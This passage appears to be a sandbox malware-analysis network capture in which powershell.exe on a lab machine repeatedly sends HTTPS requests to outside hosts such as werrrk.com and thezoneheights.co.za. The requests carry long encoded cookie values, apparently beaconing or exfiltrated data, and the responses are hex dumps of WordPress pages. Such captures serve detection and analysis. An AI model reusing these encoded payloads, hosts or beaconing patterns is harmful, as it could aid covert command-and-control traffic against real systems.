                                                    2024-12-18 10:18:35 UTC1369INData Raw: 73 20 62 79 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 70 6c 75 67 69 6e 20 76 37 2e 31 39 20 2d 20 55 73 69 6e 67 20 41 6e 61 6c 79 74 69 63 73 20 74 72 61 63 6b 69 6e 67 20 2d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 61 63 74 6d 65 74 72 69 63 73 2e 63 6f 6d 2f 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 4e 6f 74 65 3a 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 69 73 20 6e 6f 74 20 63 75 72 72 65 6e 74 6c 79 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 20 54 68 65 20 73 69 74 65 20 6f 77 6e 65 72 20 6e 65 65 64 73 20 74 6f 20 61 75 74 68 65 6e 74 69 63 61 74 65 20 77 69 74 68 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 69 6e 20 74 68 65 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 73 65 74 74 69 6e 67 73 20 70 61 6e 65 6c
                                                    Data Ascii: s by ExactMetrics plugin v7.19 - Using Analytics tracking - https://www.exactmetrics.com/ -->... Note: ExactMetrics is not currently configured on this site. The site owner needs to authenticate with Google Analytics in the ExactMetrics settings panel
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64
                                                    Data Ascii: ,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\ud
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61
                                                    Data Ascii: ar e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e
                                                    Data Ascii: important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style>
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e
                                                    Data Ascii: block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66
                                                    Data Ascii: on){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#fffff


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.11.204972266.198.240.434438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:18:53 UTC2269OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRy26DMBD8lfIDOVW9E4c2HKKgkDRSLhUyC2zjl7yGgMTHdx3S9FD54JmdHe/DVV+jrds5kdZ0lgID8kR8hUZbMye1Uku8vuk5gdEp68HPSWNNqP2waHmtYE6wbUZxykvwA8oHz3asmgBKuO1GFOUg/zhIvPPvDr/o16SoiuV3oK2fXoTVzgMRxlb2TcMpQqG8Hu2hjxEDqXOr/EOI1RnNs7KzN/DUgVJzUrA [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: werrrk.com
                                                    Connection: Close
                                                    2024-12-18 10:18:54 UTC255INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:18:54 GMT
                                                    Content-Length: 11752
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    cf-edge-cache: no-cache
                                                    Server: imunify360-webshield/1.21
                                                    2024-12-18 10:18:54 UTC11752INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 0a 2e 73 70 69 6e 6e 65 72 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf8"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <link rel="icon" href="data:,"> <title>One moment, please...</title> <style> .spinner { -webkit-animati


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.11.2049723197.189.243.2124431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:18:58 UTC2279OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRy26DMBD8lfIDOVW9E4c2HKKgkDRSLhUyC2zjl7yGgMTHdx3S9FD54JmdHe/DVV+jrds5kdZ0lgID8kR8hUZbMye1Uku8vuk5gdEp68HPSWNNqP2waHmtYE6wbUZxykvwA8oHz3asmgBKuO1GFOUg/zhIvPPvDr/o16SoiuV3oK2fXoTVzgMRxlb2TcMpQqG8Hu2hjxEDqXOr/EOI1RnNs7KzN/DUgVJzUrA [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: thezoneheights.co.za
                                                    Connection: Close
                                                    2024-12-18 10:19:01 UTC485INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:18:58 GMT
                                                    Server: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fips
                                                    X-Powered-By: PHP/7.4.8
                                                    Link: <https://thezoneheights.co.za/wp-json/>; rel="https://api.w.org/", <https://thezoneheights.co.za/wp-json/wp/v2/pages/113>; rel="alternate"; title="JSON"; type="application/json", <https://thezoneheights.co.za/>; rel=shortlink
                                                    Vary: Accept-Encoding,User-Agent
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:19:01 UTC4286INData Raw: 31 30 62 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 54 68 65 20 5a 6f 6e 65 20 48 65 69 67 68 74 73 20 26 23 38 32 31 31 3b 20 54 68 65 20 7a 7a 6f 6e 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61
                                                    Data Ascii: 10b6<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>The Zone Heights &#8211; The zzone</title><meta na
                                                    2024-12-18 10:19:02 UTC8192INData Raw: 31 66 34 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 37 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                    Data Ascii: 1f40<link rel='stylesheet' id='wp-block-library-css' href='https://thezoneheights.co.za/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1' media='all' /><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-
                                                    2024-12-18 10:19:02 UTC1524INData Raw: 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 29 20 21 69 6d 70 6f 72 74
                                                    Data Ascii: ght-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !import
                                                    2024-12-18 10:19:02 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:19:02 UTC4309INData Raw: 31 30 63 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 37 2e 35 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a
                                                    Data Ascii: 10cd<link rel='stylesheet' id='contact-form-7-css' href='https://thezoneheights.co.za/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' media='all' /><link rel='stylesheet' id='hello-elementor-css' href='https://thezoneheights.co.z
                                                    2024-12-18 10:19:02 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 46 46 46 46 46 46 22 3e 0a 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 6c 6f 67 6f 74 7a 68 2d 33 32 78 33 32 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f
                                                    Data Ascii: 1f40<meta name="theme-color" content="#FFFFFF"><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/03/cropped-logotzh-32x32.jpg" sizes="32x32" /><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/
                                                    2024-12-18 10:19:02 UTC7817INData Raw: 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 09 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 65 2d 66 6f 6e 74 2d 69 63 6f 6e 2d 73 76 67 20 65 2d 66 61 62 2d 6c 69 6e 6b 65 64 69 6e 2d 69 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 34 38 20 35 31 32 22 20 78
                                                    Data Ascii: -icon-list-text"></span></li><li class="elementor-icon-list-item elementor-inline-item"><span class="elementor-icon-list-icon"><svg aria-hidden="true" class="e-font-icon-svg e-fab-linkedin-in" viewBox="0 0 448 512" x
                                                    2024-12-18 10:19:02 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:19:02 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 77 70 2d 70 61 67 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 31 31 33 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 31 31 33 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 35 36 61 32 31 62 64 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 68 65 69 67 68 74 2d 6d 69 6e 2d 68 65 69 67 68 74 20 65 6c 65 6d 65 6e 74 6f 72
                                                    Data Ascii: 1f40<div data-elementor-type="wp-page" data-elementor-id="113" class="elementor elementor-113"><section class="elementor-section elementor-top-section elementor-element elementor-element-56a21bd9 elementor-section-height-min-height elementor
                                                    2024-12-18 10:19:02 UTC7822INData Raw: 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 61 66 74 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 62 6f 72 64 65 72 2d 74 6f
                                                    Data Ascii: n .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:"";border-bottom:0;flex-grow:1;border-to


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.11.2049724194.163.167.354438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:19:15 UTC2273OUTGET / HTTP/1.1
